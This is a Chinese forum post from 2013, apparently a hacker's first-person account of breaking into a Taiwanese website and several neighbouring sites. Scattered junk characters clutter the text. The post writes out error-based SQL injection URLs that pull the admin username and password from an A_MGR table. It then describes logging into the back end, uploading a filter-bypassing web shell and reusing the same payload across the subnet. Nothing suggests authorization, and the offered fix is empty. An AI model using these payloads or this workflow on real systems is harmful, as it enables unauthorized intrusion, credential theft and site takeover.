发现一个注入点
" h5 P7 d8 ^: Fhttp://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389
, }0 ~$ B5 M+ |" c3 X' g- @1 M% y( p6 u0 j, C
习惯性的加’having1=1--6 w2 K: B' C8 P9 p* d7 G
2 G* R- ]* z, }4 O* r M; v/ q& r& lhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—
& `/ _" C# f8 q' j: F3 I, _
! o% f& ?0 R9 V+ n! c0. j( n' h) H* |0 k$ u0 L
# ]. b0 C# |- ^% D爆出Diary_A.dl_Title(这时候很激动啊)
% ]" j3 P( |0 t" S& z( w8 }- |
9 w. o/ }, E" z; u那么继续) ?! A" N0 ` r5 P
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—; s% i! t% [7 C" K: k* X
7 k- c& b& u5 @6 Z1 L& [继续,一直爆下去' X- F8 D0 |, i) T. T" B
8 d2 a0 [; n7 C$ w2 B' w! X! q: \爆到几个字段和表段 但是没找到需要的管理用户的字段3 M/ n! M, O8 k# y; B
3 Z Z" B/ ?3 d+ r" H3 m# b1 n蛋疼了 怎么办 然后去后台登陆页看源码6 A) V0 _( z2 x$ [
" P$ m9 ~8 D) {: E0
& @% M6 n' k: z; X" O5 X+ W
. {+ X5 ^, L1 _Input name= “ADUID”9 R! q' e% K1 d6 B5 d o% M4 ^
Input name= “ADPWD”
$ }# u$ M& a' B# [. K
6 \. D! z O! f) k很幸运 找到了字段那就继续" n8 d5 e% _9 i, Y9 [- w
找到之后开始爆用户
4 v$ l3 P% P" j# E* Fhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—
! W7 a# J; I! c% a. C: U爆密码. T! k+ r4 G* V5 P+ x
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—7 B7 c5 w" e# R3 u( @- o
测试了下 这个注入点只能爆到文章哪里的表
j) @3 R# A' P) u. A5 X) E" Q, t2 s/ U. ~
头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了
. a$ x7 y% [2 @' k- F' |, q4 j. t2 u8 `3 H! X% {; R) A
又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了, Y P3 S* ^2 D; A
, @6 t" L5 w/ d% m/ M2 d# M473
! v4 k8 ?4 r# J+ T# t8 S
# @2 |, F2 I. E! Z进后台
7 K& y6 \# [" W. R1 _- p, @9 S9 [2 d% _
& p) R$ q5 c5 _; p2 p6 [发现几个上传点 有的地方不能上传 而且防止恶意代码. |( A# b# h- \* F
6 s, h( q6 q) @没办法 各种百度各种找大牛 找到一只好像可以突破的马( |/ A$ S1 ?: T8 O o/ w% `6 S
/ q3 s4 U5 q4 p+ g/ N. w& g. {, a5 J1 V# \& E* M
在系统管理那里直接上传 不过没有显示地址3 q. B0 Y: J X+ h# u4 R5 }
) `1 V# E6 `& e0 l9 F' D7 r+ Q, U
再上传一次 抓包 搞定OK
2 L& F3 ?7 B) P; Y+ s8 c+ G" Y1 j0 q; `
+ A: w, A: l5 Z! m. O! q2 h, u, @0 W) x! a- R
472
) d% s: m; q3 S/ C0 _
, q" Y6 K. p x晚上不行了 去睡觉。。。
z# [; u% o' e- R- S, C; p- m第二天刚起床 闲的没事做继续日站吧 ! I: m- ~$ I& V+ ?2 }( A
M# n) r6 P, L$ x* Z6 S
找个站 就把这个站的旁c扫了下
# [2 A3 k1 L+ `
: ~; m- J! b9 d, j" p发现c段也有一个购物站 ,然后还和这个站的模板差不多2 c8 O% q& Y# ]0 u$ T6 V6 H' U
8 O8 A, P9 I, g o
就找到会员登录口测试
9 c( Y% m* p) c4 i4 f0 ]9 i: C A: M) k. }1 s5 B. X9 F( S$ |: Q
'and (select top 1 MGR_UID from A_MGR)>0—) ^9 r2 F$ {& K2 j; f0 ]3 u, y
果断爆到了 这时候我很激动 通杀
' M( ~# B8 L$ D9 y/ G- J
& x% ?1 A8 r, {# E- F+ }再次翻c段
' Q7 C7 W0 m! a
8 y |- L* a. {% j0 n5 p% W/ j9 b; b翻出几个站 都成功拿下
1 n( u: W) x+ O: O$ X) `% E0 q- I5 Q( F2 r7 L* u; u
1 a7 [1 S7 [5 I# T- x5 r' p$ ]4 K
8 }) S2 c) U$ X2 e8 j# z1 E4 I$ D
修复方案:
: W2 d! n9 [/ W7 ?3 h/ x他们比我专业
: [. O* V V% _% D( g/ H
/ j A- e$ v; ]$ l' Z( ~
: g m: z& }% y0 t! J* B) z
& w9 |: L6 T+ ^ |
发表于 2013-4-4 17:40:38
收藏
支持
反对